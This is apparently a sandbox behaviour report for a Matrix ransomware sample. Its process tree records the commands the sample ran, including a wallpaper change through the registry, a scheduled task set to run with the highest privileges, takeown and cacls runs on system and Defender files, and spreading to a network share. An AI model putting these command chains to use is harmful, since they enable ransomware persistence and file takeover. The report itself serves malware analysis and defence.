Token: SeIncBasePriorityPrivilege	5032	WMIC.exe
Token: SeCreatePagefilePrivilege	5032	WMIC.exe
Token: SeBackupPrivilege	5032	WMIC.exe
Token: SeRestorePrivilege	5032	WMIC.exe
Token: SeShutdownPrivilege	5032	WMIC.exe
Token: SeDebugPrivilege	5032	WMIC.exe

Suspicious use of WriteProcessMemory 1272 IoCs

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.exeK9TOpZud.execmd.exe

description	pid	process	target process
PID 3428 wrote to memory of 3180	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 3180	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 3180	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 1248	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	NWCmUw1f.exe
PID 3428 wrote to memory of 1248	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	NWCmUw1f.exe
PID 3428 wrote to memory of 1248	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	NWCmUw1f.exe
PID 3428 wrote to memory of 4188	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4188	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4188	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4200	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4200	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4200	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 4188 wrote to memory of 4284	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4284	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4284	4188	cmd.exe	reg.exe
PID 4200 wrote to memory of 4320	4200	cmd.exe	wscript.exe
PID 4200 wrote to memory of 4320	4200	cmd.exe	wscript.exe
PID 4200 wrote to memory of 4320	4200	cmd.exe	wscript.exe
PID 4188 wrote to memory of 4352	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4352	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4352	4188	cmd.exe	reg.exe
PID 3428 wrote to memory of 4368	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4368	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4368	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 4188 wrote to memory of 4440	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4440	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 4440	4188	cmd.exe	reg.exe
PID 4368 wrote to memory of 4536	4368	cmd.exe	cacls.exe
PID 4368 wrote to memory of 4536	4368	cmd.exe	cacls.exe
PID 4368 wrote to memory of 4536	4368	cmd.exe	cacls.exe
PID 4320 wrote to memory of 4572	4320	wscript.exe	cmd.exe
PID 4320 wrote to memory of 4572	4320	wscript.exe	cmd.exe
PID 4320 wrote to memory of 4572	4320	wscript.exe	cmd.exe
PID 4368 wrote to memory of 4584	4368	cmd.exe	takeown.exe
PID 4368 wrote to memory of 4584	4368	cmd.exe	takeown.exe
PID 4368 wrote to memory of 4584	4368	cmd.exe	takeown.exe
PID 4572 wrote to memory of 4636	4572	cmd.exe	schtasks.exe
PID 4572 wrote to memory of 4636	4572	cmd.exe	schtasks.exe
PID 4572 wrote to memory of 4636	4572	cmd.exe	schtasks.exe
PID 3428 wrote to memory of 4648	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4648	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 3428 wrote to memory of 4648	3428	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe	cmd.exe
PID 4368 wrote to memory of 4704	4368	cmd.exe	cmd.exe
PID 4368 wrote to memory of 4704	4368	cmd.exe	cmd.exe
PID 4368 wrote to memory of 4704	4368	cmd.exe	cmd.exe
PID 4648 wrote to memory of 4732	4648	cmd.exe	cacls.exe
PID 4648 wrote to memory of 4732	4648	cmd.exe	cacls.exe
PID 4648 wrote to memory of 4732	4648	cmd.exe	cacls.exe
PID 4704 wrote to memory of 4724	4704	cmd.exe	K9TOpZud.exe
PID 4704 wrote to memory of 4724	4704	cmd.exe	K9TOpZud.exe
PID 4704 wrote to memory of 4724	4704	cmd.exe	K9TOpZud.exe
PID 4648 wrote to memory of 4772	4648	cmd.exe	takeown.exe
PID 4648 wrote to memory of 4772	4648	cmd.exe	takeown.exe
PID 4648 wrote to memory of 4772	4648	cmd.exe	takeown.exe
PID 4648 wrote to memory of 4792	4648	cmd.exe	cmd.exe
PID 4648 wrote to memory of 4792	4648	cmd.exe	cmd.exe
PID 4648 wrote to memory of 4792	4648	cmd.exe	cmd.exe
PID 4724 wrote to memory of 4804	4724	K9TOpZud.exe	K9TOpZud64.exe
PID 4724 wrote to memory of 4804	4724	K9TOpZud.exe	K9TOpZud64.exe
PID 4792 wrote to memory of 4844	4792	cmd.exe	K9TOpZud.exe
PID 4792 wrote to memory of 4844	4792	cmd.exe	K9TOpZud.exe
PID 4792 wrote to memory of 4844	4792	cmd.exe	K9TOpZud.exe
PID 4320 wrote to memory of 4856	4320	wscript.exe	cmd.exe
PID 4320 wrote to memory of 4856	4320	wscript.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
"C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe" "C:\Users\Admin\AppData\Local\Temp\NWCmUw1f.exe"
  2⤵
  PID:3180
- C:\Users\Admin\AppData\Local\Temp\NWCmUw1f.exe
  "C:\Users\Admin\AppData\Local\Temp\NWCmUw1f.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1248
- - C:\Users\Admin\AppData\Local\Temp\NWCmUw1f.exe
    "C:\Users\Admin\AppData\Local\Temp\NWCmUw1f.exe" "\\10.10.0.12\C$"
    3⤵
    PID:5696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\LSGOzXyB.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\LSGOzXyB.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - Modifies Control Panel
    PID:4284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:4352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\V8OjOZZK.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\V8OjOZZK.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TlWF1x4P.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4572
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\TlWF1x4P.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:4636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:4856
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:4964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4724
    - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud64.exe
        
        K9TOpZud.exe -accepteula "classes.jsa" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Modifies service
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    - Modifies file permissions
    PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:4844
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:4184
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:3280
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3168
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:4664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:4628
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4944
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4676
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5116
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:4292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4544
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3164
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SenseSampleUploader.exe" -nobanner
    3⤵
    PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SenseSampleUploader.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4604
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4660
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:4420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:5012
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5004
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4244
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "MsSense.exe.mui" -nobanner
    3⤵
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "MsSense.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4276
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:4556
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5068
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4356
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4940
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:4560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Workflow.Targets" -nobanner
